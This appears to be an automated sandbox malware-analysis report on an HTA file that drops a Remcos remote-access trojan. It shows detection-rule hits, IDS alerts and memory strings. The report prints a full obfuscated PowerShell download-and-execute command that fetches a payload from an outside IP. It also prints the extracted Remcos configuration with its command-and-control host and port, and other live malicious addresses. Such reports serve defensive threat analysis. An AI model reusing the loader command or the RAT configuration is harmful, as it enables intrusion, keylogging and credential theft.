                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6596, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", ProcessId: 6672, ProcessName: wscript.exe
                        Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, CommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: mshta.exe "C:\Users\user\Desktop\earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta", ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6972, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, ProcessId: 6596, ProcessName: cmd.exe
                        Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6596, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", ProcessId: 6672, ProcessName: wscript.exe
                        Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\mshta.exe, ProcessId: 6972, TargetFilename: C:\Windows\Temp\unmovably.bat
                        Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 23.186.113.60, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\wscript.exe, Initiated: true, ProcessId: 6672, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49720
                        Source: Process startedAuthor: Michael Haag: Data: Command: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", CommandLine|base64offset|contains: +, Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c C:\Windows\Temp\unmovably.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6596, ParentProcessName: cmd.exe, ProcessCommandLine: wscript //nologo "C:\Windows\Temp\nonordinary.vbs", ProcessId: 6672, ProcessName: wscript.exe
                        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#b

                        Stealing of Sensitive Information

                        barindex
                        Source: Registry Key setAuthor: Joe Security: Data: Details: 56 29 98 18 4C DE 7A 0C 00 E9 69 F7 18 22 2A CD 3D DE B8 BD 4C 23 5F FA 2D 51 41 F4 4D FE E6 53 DA 00 D7 12 06 10 A7 4B C0 39 BB 8C 7A 41 7D DA 05 1D 65 34 C5 A1 EF 4A A4 36 52 93 E5 2D EB 76 A0 78 B0 CF DC 8E D4 A6 1B 27 5F 43 27 0D E6 1F 42 7B FC C1 01 08 65 1C 36 D8 0F D0 52 6A B8 62 43 89 A2 EE BE 16 62 8D 60 37 46 65 57 86 B7 F8 E4 62 , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 8328, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-4E8SNN\exepath
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-15T09:19:55.056062+010020204251Exploit Kit Activity Detected172.245.191.8880192.168.2.549722TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-15T09:19:55.056062+010020204241Exploit Kit Activity Detected172.245.191.8880192.168.2.549722TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-15T09:19:57.069849+010020365941Malware Command and Control Activity Detected192.168.2.549723185.208.156.4514645TCP
                        2025-03-15T09:19:58.445053+010020365941Malware Command and Control Activity Detected192.168.2.549724185.208.156.4514645TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-15T09:19:52.352878+010020477501A Network Trojan was detected104.168.7.3880192.168.2.549721TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-15T09:19:42.008817+010020576351A Network Trojan was detected172.245.191.8880192.168.2.549722TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-15T09:19:53.919664+010020490381A Network Trojan was detected104.168.7.3880192.168.2.549721TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-15T09:19:58.499073+010028033043Unknown Traffic192.168.2.549725178.237.33.5080TCP
                        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                        2025-03-15T09:19:42.008817+010028582951A Network Trojan was detected172.245.191.8880192.168.2.549722TCP

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: http://104.168.7.38/xampp/sv/ENCRYPTION01.jpgAvira URL Cloud: Label: malware
                        Source: qwertyuioplkjhgfdsazxcvbnm.ydns.euAvira URL Cloud: Label: malware
                        Source: 12.2.CasPol.exe.400000.0.unpackMalware Configuration Extractor: Remcos {"Host:Port:Password": ["qwertyuioplkjhgfdsazxcvbnm.ydns.eu:14645:1"], "Assigned name": "zyno666", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-4E8SNN", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                        Source: earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaVirustotal: Detection: 29%Perma Link
                        Source: earereallyniceloverwithgreatthingsonthatkissinggirlonme.htaReversingLabs: Detection: 27%
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR
                        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00433B64 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_00433B64
                        Source: powershell.exe, 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_ad683038-1

                        Exploits

                        barindex
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR

                        Privilege Escalation

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406ABC _wcslen,CoGetObject,12_2_00406ABC
                        Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.5:49720 version: TLS 1.2
                        Source: Binary string: dnlib.DotNet.Pdb.PdbWriter+ source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywritermicrosoft.win32.taskschedulertaskregistrationinfomicrosoft.win32.taskschedulershowmessageactiondnlib.dotnetihasdeclsecuritycomhandlerupdatemicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokendnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 0000000A.00000002.1421000865.0000000006F60000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: `2microsoft.win32.taskschedulernotsupportedpriortoexceptiondnlib.dotnetmodulerefuserdnlib.dotnet.mddotnetstreamdnlib.dotnet.writerusheapdnlib.dotnet.pdbimage_debug_directorydnlib.dotnet.writermdtable`1microsoft.win32.taskschedulermaintenancesettingsdnlib.dotnet.writercreatepdbsymbolwriterdelegatemicrosoft.win32.taskschedulertaskrightsdnlib.dotnet.writermodulewriterexceptiondnlib.dotnet.pdb.managedpdbreaderdnlib.dotnetparamattributesdnlib.dotnet.writerhotheapdnlib.dotnettypedeforrefsigdnlib.dotnettypenameparserexceptiondnlib.dotnetexportedtypeuserdnlib.dotnet.emitcilbodydnlib.dotnet.writersignaturewriterdnlib.dotnetmethodspecuserdnlib.dotnetvtablemicrosoft.win32.taskscheduler.fluentintervaltriggerbuildermicrosoft.win32.taskschedulernotv2supportedexceptiondnlib.dotnetcanamedargumentdnlib.dotnet.emitmethodutilsdnlib.dotnet.writerblobheapdnlib.dotnet.pdbpdbstateelemdnlib.dotnetresolveexceptiondnlib.dotnet.resourcesresourceelementsetdnlib.dotnetifielddnlib.dotnet.mdrawconstantrowdnlib.dotnet.resourcesuserresourcetypemicrosoft.win32.taskschedulerregistrationtriggerdnlib.dotneteventequalitycomparertaskprincipalprivilegesenumeratordnlib.dotnettypespecdnlib.dotnet.emitopcodesmicrosoft.win32.taskschedulernamevaluepairmicrosoft.win32.taskschedulertaskaccessrulednlib.dotnet.mdtablednlib.dotnetihassemanticmicrosoft.win32.taskschedulertaskprocesstokensidtypemicrosoft.win32.taskschedulertaskcollectiondnlib.dotnetpinnedsigdnlib.dotnetmanifestresourcednlib.dotnet.emitinvalidmethodexceptiondnlib.dotnet.mdrawmodulerefrow<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.w32resourcesresourcename<>c<>c<>c<>c<>c<>c<>c<>c<>c<>cdnlib.dotnet.emitinstructiondnlib.dotnet.emitflowcontroldnlib.dotnetiresolverdnlib.dotnetassemblyrefdnlib.dotnet.writerhotheap20microsoft.win32.taskschedulerweeklytriggerdnlib.dotnetptrsigdnlib.dotnet.resourcesresourcetypecodemicrosoft.win32.taskscheduler.fluentsettingsbuilderdnlib.dotnet.mdrawpropertymaprowdnlib.dotnet.mdirowreader`1microsoft.win32.taskschedulertasktriggertypednlib.dotnet.mdcolumninfodnlib.dotnetnonleafsigdnlib.dotnetcallingconventionsigmicrosoft.win32.taskscheduleridlesettingsdnlib.dotnet.writeruniquechunklist`1dnlib.dotnetsigcompareroptionsdnlib.dotnetassemblydefdnlib.ioifilesectiondnlib.dotnetsignaturereadermicrosoft.win32.taskschedulerlogontriggerdnlib.dotnet.mdrawimplmaprowdnlib.dotnetimemberrefdnlib.dotnet.writerbytearraychunkdnlib.dotnetarraymarshaltypednlib.pesubsystemdnlib.dotnetassemblylinkedresourcednlib.dotnetcmodoptsigdnlib.dotnet.mdmdtablednlib.dotnetlocalsigdnlib.dotnetimemberdefdnlib.dotnetfixedarraymarshaltypemicrosoft.win32.taskschedulercomhandleractiondnlib.dotnetmoduledefmd2dnlib.dotnet.emitdynamicmethodbodyreaderdnlib.dotnetclasslayoutuserdnlib.dotnetmethodsigtokentypemicrosoft.win32.taskschedulermonthlytriggerdnlib.peipeimagednlib.dotnet.mdrawfilerowdnlib.dotnet.writerhotheap40dnlib.dotnetmodifiersigdnlib.dotnetfullnamecreatordnlib.dotnet.emitnativemethodbodydnlib.dotnetfiledefuserdnlib.pemachinednlib.dotnetarraysigbasednlib
                        Source: Binary string: dnlib.dotnet.mdrawmethodimplrowdnlib.dotnet.pdbpdbimpltype source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 0000000A.00000002.1421000865.0000000006F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.iofilesectiondnlib.threadingenumerableiteratealldelegate`1dnlib.dotnet.pdb.managedpdbexceptiondnlib.dotnetleafsig source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: >.CurrentSystem.Collections.IEnumerator.CurrentSystem.Collections.Generic.IEnumerator<System.Int32>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.UInt32,System.Byte[]>>.get_CurrentSystem.Collections.Generic.IEnumerator<System.Collections.Generic.KeyValuePair<System.String,System.String>>.get_CurrentSystem.Collections.Generic.IEnumerator<T>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CustomAttribute>.get_CurrentSystem.Collections.Generic.IEnumerator<TValue>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.FieldDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MethodDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.EventDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.PropertyDef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.ModuleRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.TypeRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MemberRef>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyRef>.get_CurrentSystem.Collections.Generic.IEnumerator<System.String>.get_CurrentSystem.Collections.Generic.IEnumerator<TIn>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.TaskFolder>.get_CurrentSystem.Collections.Generic.IEnumerator<Microsoft.Win32.TaskScheduler.Trigger>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.CANamedArgument>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.MD.IRawRow>.get_CurrentSystem.Collections.Generic.IEnumerator<dnlib.DotNet.AssemblyResolver. source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: c:\Projects\VS2005\WebBrowserPassView\Command-Line\WebBrowserPassView.pdb source: CasPol.exe, 0000000C.00000002.3707861943.00000000037E0000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 0000000E.00000002.1405105210.0000000000400000.00000040.80000000.00040000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.mdrawassemblyrefrowdnlib.dotnet.writermethodbodychunksmicrosoft.win32.taskschedulernetworksettingsmicrosoft.win32.taskschedulertaskschedulersnapshotcronfieldtypesystem.runtime.compilerservicesisreadonlyattributednlib.dotnet.mdrawtypespecrowdnlib.dotnetfielddefuserdnlib.dotnetinterfacemarshaltypednlib.dotnet.writermetadataflagsdnlib.dotnet.mdrawfieldlayoutrowmicrosoft.win32.taskschedulertaskdnlib.dotnet.writermetadataoptionsdnlib.dotnetimdtokenproviderdnlib.dotnetsignatureequalitycomparermicrosoft.win32.taskschedulerquicktriggertypednlib.dotnetifullnamecreatorhelperdnlib.dotnet.resourcesresourceelementdnlib.dotnetmodulecreationoptionsdnlib.dotnet.emitiinstructionoperandresolverdnlib.utilslazylist`1dnlib.dotnetpropertyattributesdnlib.dotnet.mdrawmethodrowdnlib.dotnet.mdrawassemblyrowdnlib.threadingexecutelockeddelegate`3dnlib.dotnetmoduledefmddnlib.ioiimagestreamdnlib.dotnetclasssigdnlib.dotnetstrongnamesignerdnlib.dotnetinvalidkeyexceptionelemequalitycomparerdnlib.dotnet.mdrawpropertyptrrowdnlib.threadinglistiteratealldelegate`1microsoft.win32.taskscheduler.fluentbasebuilderdnlib.dotnet.mdheapstreamdnlib.pepeimagednlib.dotnetitypedeffindermicrosoft.win32.taskschedulersnapshotitemdnlib.dotnetmemberrefdnlib.dotnetimemberrefresolverdnlib.dotnetconstantuserdnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrow source: powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000A.00000002.1429145927.0000000008EF0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000A.00000002.1403832641.00000000057B5000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 0000000A.00000002.1421000865.0000000006F60000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1420699141.0000000006DDA000.00000004.00000800.00020000.00000000.sdmp
